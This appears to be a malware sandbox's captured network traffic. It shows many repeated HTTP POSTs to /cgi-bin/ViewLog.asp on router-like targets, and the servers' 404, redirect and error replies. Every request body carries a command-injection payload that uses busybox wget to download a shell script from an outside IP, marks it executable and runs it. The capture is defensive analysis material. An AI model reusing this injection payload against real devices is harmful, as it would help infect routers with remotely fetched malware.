                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-famil


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      635192.168.2.154013895.179.246.1478080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.272264004 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.474416018 CET433INHTTP/1.1 404
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Methods: *
                                                      Access-Control-Max-Age: 3600
                                                      Access-Control-Allow-Headers: *
                                                      X-Application-Context: application
                                                      Content-Type: application/json;charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Date: Wed, 14 Feb 2024 08:30:23 GMT
                                                      Data Raw: 37 62 0d 0a 7b 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 37 38 39 39 34 32 33 33 37 38 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 65 72 72 6f 72 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 20 6d 65 73 73 61 67 65 20 61 76 61 69 6c 61 62 6c 65 22 2c 22 70 61 74 68 22 3a 22 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 7d 0d 0a
                                                      Data Ascii: 7b{"timestamp":1707899423378,"status":404,"error":"Not Found","message":"No message available","path":"/cgi-bin/ViewLog.asp"}


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      636192.168.2.154795685.191.4.2258080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.281725883 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.497394085 CET626INHTTP/1.1 404
                                                      Content-Type: text/html;charset=utf-8
                                                      Content-Language: en
                                                      Content-Length: 431
                                                      Date: Wed, 14 Feb 2024 08:30:23 GMT
                                                      Keep-Alive: timeout=5
                                                      Connection: keep-alive
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                      Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      637192.168.2.155904494.210.210.468080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.290554047 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      638192.168.2.154787094.121.55.1018080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.316791058 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      639192.168.2.155719631.200.7.1448080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.318203926 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      640192.168.2.155558062.29.52.888080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.320090055 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      641192.168.2.156015231.44.143.1618080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.323806047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      642192.168.2.1551418119.29.120.22223
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.490396023 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:54Auth Result: ????.
                                                      Feb 14, 2024 09:30:24.656995058 CET171INHTTP/1.0 200 OK
                                                      Server: Proxy
                                                      Data Raw: 0d 0a 0d 0a 0d 0a 55 6e 61 75 74 68 6f 72 69 7a 65 64 20 2e 2e 2e 0d 0a 0d 0a 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 37 2e 37 34 0d 0a 4d 41 43 20 41 64 64 72 65 73 73 3a 20 0d 0a 53 65 72 76 65 72 20 54 69 6d 65 3a 20 32 30 32 34 2d 30 32 2d 31 34 20 31 36 3a 33 30 3a 35 34 0d 0a 41 75 74 68 20 52 65 73 75 6c 74 3a 20 3f 3f 3f 3f 2e 0d 0a 0d 0a 0d 0a
                                                      Data Ascii: Unauthorized ...IP Address: 81.181.57.74MAC Address: Server Time: 2024-02-14 16:30:54Auth Result: ????.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      643192.168.2.155204831.136.54.1828080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.493983030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:24.184581041 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:25.528588057 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:28.248502016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.624402046 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:44.375952005 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:05.879410982 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:48.886236906 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      644192.168.2.153784285.153.141.718080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.548598051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:23.788208961 CET221INHTTP/1.1 307 Temporary Redirect
                                                      Location: https://192.168.0.14:5886/cgi-bin/ViewLog.asp
                                                      Date: Wed, 14 Feb 2024 08:30:23 GMT
                                                      Connection: keep-alive
                                                      Keep-Alive: timeout=5
                                                      Transfer-Encoding: chunked
                                                      Data Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      645192.168.2.154511894.122.71.578080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.557600021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      646192.168.2.155641094.120.215.678080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.558973074 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      647192.168.2.156075895.0.173.2378080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.574474096 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      648192.168.2.155482062.3.30.548080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:30:23.758946896 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
